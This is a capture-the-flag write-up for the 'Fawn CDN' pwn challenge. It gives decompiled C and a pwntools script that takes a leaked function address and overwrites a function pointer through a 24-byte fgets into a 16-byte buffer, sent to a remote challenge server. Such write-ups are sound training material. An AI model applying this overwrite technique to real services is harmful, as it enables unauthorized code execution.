# Fawn CDN

## Challenge files
We get a binary that's allegedly a "CDN".

## Analysis

Ghidra provided a nice decompilation of this binary. It had some debugging symbols, which helped!
(Variable names are mine)
```c
int main(void)

{
  long in_FS_OFFSET;
  int opt;
  anon_struct_for_s s;
  long canary;
  
  canary = *(long *)(in_FS_OFFSET + 0x28);
  boringsetup();
  opt = 0;
  s.fptr = deliver;
  puts(banner);
  while (opt != 4) {
    printf("%s\ncmd> ",prompt);
    fgets((char *)&s,0x19,stdin);
    opt = atoi((char *)&s);
    if ((opt < 5) && (0 < opt)) {
      if (opt == 4) {
        printf("%s",bye);
                    /* WARNING: Subroutine does not return */
        exit(0);
      }
      if (opt < 5) {
        if (opt == 3) {
          (*s.fptr)();
        }
        else {
          if (opt < 4) {
            if (opt == 1) {
              printf(list_msg,win);
            }
            else {
              if (opt == 2) {
                printf("%s",choose_msg);
              }
            }
          }
        }
      }
    }
    else {
      puts("Please choose a valid option!");
    }
  }
  if (canary == *(long *)(in_FS_OFFSET + 0x28)) {
    return 0;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}
```

## Solution
If we give the input `1`, it prints out the address of the function we need to call. The `s` structure is 16 characters followed by a function pointer, and that function pointer is called if we enter `3`. So basically we get the address with `1`, then enter `3` followed by the pointer and get the flag.

Also, the flag is a jpg. Not sure why.

## Solution program
```py
from pwn import *

context.arch = "amd64"
context.terminal = ["tilix", "-e"]

#conn = gdb.debug("./fawncdn")
conn = remote("35.224.135.84", 1001)

while not b"Quit" in conn.recvline():
    pass
conn.recvline()
conn.sendline(b"1")
addr = int(conn.recvline(keepends=False).decode("ascii").split(" ")[-1].removesuffix('"}'), 16)
print(hex(addr))
while not b"Quit" in conn.recvline():
    pass
conn.recvline()
payload = b"3" + b"\0" * 15 + p64(addr)
conn.sendline(payload)
with open("flag.jpg", "wb") as f:
    f.write(conn.recvuntil(b"1. List files"))
conn.close()
```
